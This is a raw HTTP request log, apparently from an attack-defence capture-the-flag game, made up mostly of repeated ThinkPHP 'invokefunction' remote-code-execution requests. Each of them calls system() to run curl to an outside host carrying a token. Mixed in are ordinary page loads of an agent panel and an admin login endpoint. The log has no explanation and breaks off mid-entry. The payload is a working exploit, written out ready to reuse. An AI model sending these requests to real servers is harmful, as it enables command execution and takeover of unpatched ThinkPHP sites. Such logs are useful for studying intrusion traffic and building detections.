--------------------------------------------------
[19-11-22 12:01:11]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:01:15]
SRC IP: 10.51.2.91
GET /index.php/daili/login/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=HCWIGSKB HTTP/1.1
Host: 10.50.2.2
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

--------------------------------------------------
[19-11-22 12:03:10]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:03:32]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:03:46]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:46]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:46]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:46]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:47]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:47]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:52]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:03:58]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:04:07]
SRC IP: 10.51.0.227
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KKCFJPHU HTTP/1.1
Host: 10.50.2.2
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

--------------------------------------------------
[19-11-22 12:04:29]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:04:30]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:04:30]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:04:30]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:04]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:05]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:05]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:05]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:33]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:34]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:34]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:34]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:36]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:37]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:37]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:37]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:49]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:50]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:50]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:05:50]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:06:15]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:06:16]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:06:16]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:06:16]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:06:25]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:07:01]
SRC IP: 10.51.5.121
GET /index.php/daili/login/index.html HTTP/1.1
Host: 10.50.2.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

--------------------------------------------------
[19-11-22 12:07:02]
SRC IP: 10.51.5.121
GET /index.php/dsadmin/login/getverify/t/1574424421.html HTTP/1.1
Host: 10.50.2.2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Referer: http://10.50.2.2/index.php/daili/login/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

--------------------------------------------------
[19-11-22 12:09:05]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:05]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:05]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:05]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:05]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:06]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:11]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:17]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:09:41]
SRC IP: 10.51.6.126
